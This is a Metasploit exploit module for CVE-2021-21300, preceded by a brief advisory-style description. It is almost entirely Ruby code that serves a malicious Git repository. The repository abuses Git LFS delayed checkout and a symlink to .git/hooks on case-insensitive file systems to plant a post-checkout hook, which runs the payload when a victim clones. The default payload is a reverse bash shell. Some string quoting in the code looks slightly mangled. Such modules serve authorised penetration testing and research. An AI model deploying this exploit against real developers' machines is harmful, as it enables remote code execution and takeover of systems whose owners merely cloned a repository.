Authored by Shelby Pace, Matheus Tavares, Johannes Schindelin | Site metasploit.com

Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems are vulnerable to remote code execution while cloning a repository. Usage of clean / smudge filters through Git LFS and a case-insensitive file system changes the checkout order of repository files which enables the placement of a Git hook in the .git/hooks directory. By default, this Metasploit module writes a post-checkout script so that the payload will automatically be executed upon checkout of the repository.

advisories | CVE-2021-21300

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Git
include Msf::Exploit::Git::SmartHttp
include Msf::Exploit::Git::Lfs
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Git LFS Clone Command Exec',
'Description' => %q{
Git clients that support delay-capable clean / smudge
filters and symbolic links on case-insensitive file systems are
vulnerable to remote code execution while cloning a repository.

Usage of clean / smudge filters through Git LFS and a
case-insensitive file system changes the checkout order
of repository files which enables the placement of a Git hook
in the `.git/hooks` directory. By default, this module writes
a `post-checkout` script so that the payload will automatically
be executed upon checkout of the repository.
},
'License' => MSF_LICENSE,
'Author' => [
'Johannes Schindelin', # Discovery
'Matheus Tavares', # Discovery
'Shelby Pace' # Metasploit module
],
'References' => [
[ 'CVE', '2021-21300' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ],
[ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ]
],
'DisclosureDate' => '2021-04-26',
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Git for MacOS, Windows',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
}
)
)

register_options(
[
OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
]
)

deregister_options('RHOSTS', 'RPORT')
end

def exploit
setup_repo_structure
super
end

def setup_repo_structure
link_content = '.git/hooks'
link_name = Rex::Text.rand_text_alpha(8..12).downcase
link_obj = GitObject.build_blob_object(link_content)

dir_name = link_name.upcase
git_attr = '.gitattributes'

git_hook = 'post-checkout'
@hook_payload = "#!/bin/shn#{payload.encoded}"
ptr_file = generate_pointer_file(@hook_payload)

# need to initially send the pointer file
# then send the actual object when Git LFS requests it
git_hook_ptr = GitObject.build_blob_object(ptr_file)

git_attr_content = "#{dir_name}/#{git_hook} filter=lfs diff=lfs merge=lfs"
git_attr_obj = GitObject.build_blob_object(git_attr_content)

sub_file_content = Rex::Text.rand_text_alpha(0..150)
sub_file_name = Rex::Text.rand_text_alpha(8..12)
sub_file_obj = GitObject.build_blob_object(sub_file_content)

register_dir_for_cleanup('.git')
register_files_for_cleanup(git_attr, link_name)

# create subdirectory which holds payload
sub_tree =
[
{
mode: '100644',
file_name: sub_file_name,
sha1: sub_file_obj.sha1
},
{
mode: '100755',
file_name: git_hook,
sha1: git_hook_ptr.sha1
}
]

sub_tree_obj = GitObject.build_tree_object(sub_tree)

# root of repository
tree_ent =
[
{
mode: '100644',
file_name: git_attr,
sha1: git_attr_obj.sha1
},
{
mode: '040000',
file_name: dir_name,
sha1: sub_tree_obj.sha1
},
{
mode: '120000',
file_name: link_name,
sha1: link_obj.sha1
}
]
tree_obj = GitObject.build_tree_object(tree_ent)
commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)

@git_objs =
[
commit, tree_obj, sub_tree_obj,
sub_file_obj, git_attr_obj, git_hook_ptr,
link_obj
]

@refs =
{
'HEAD' => 'refs/heads/master',
'refs/heads/master' => commit.sha1
}
end

def create_git_uri
"/#{Faker::App.name.downcase}.git".gsub(' ', '-')
end

def primer
@git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
@git_addr = URI.parse(get_uri).merge(@git_repo_uri)
print_status("Git repository to clone: #{@git_addr}")
hardcoded_uripath(@git_repo_uri)
hardcoded_uripath("/#{Digest::SHA256.hexdigest(@hook_payload)}")
end

def on_request_uri(cli, req)
if req.uri.include?('git-upload-pack')
request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
case request.type
when 'ref-discovery'
response = send_refs(request)
when 'upload-pack'
response = send_requested_objs(request)
else
fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
end
else
response = handle_lfs_objects(req)
unless response.code == 200
cli.send_response(response)
fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client's LFS request')
end
end

cli.send_response(response)
end

def send_refs(req)
fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'

response = get_ref_discovery_response(req, @refs)
fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response

response
end

def send_requested_objs(req)
upload_pack_resp = get_upload_pack_response(req, @git_objs)
unless upload_pack_resp
fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')
end

upload_pack_resp
end

def handle_lfs_objects(req)
git_hook_obj = GitObject.build_blob_object(@hook_payload)

case req.method
when 'POST'
print_status('Sending payload data...')
response = get_batch_response(req, @git_addr, git_hook_obj)
fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response
when 'GET'
print_status('Sending LFS object...')
response = get_requested_obj_response(req, git_hook_obj)
fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response
else
fail_with(Failure::UnexpectedReply, 'Unable to handle client's request')
end

response
end
end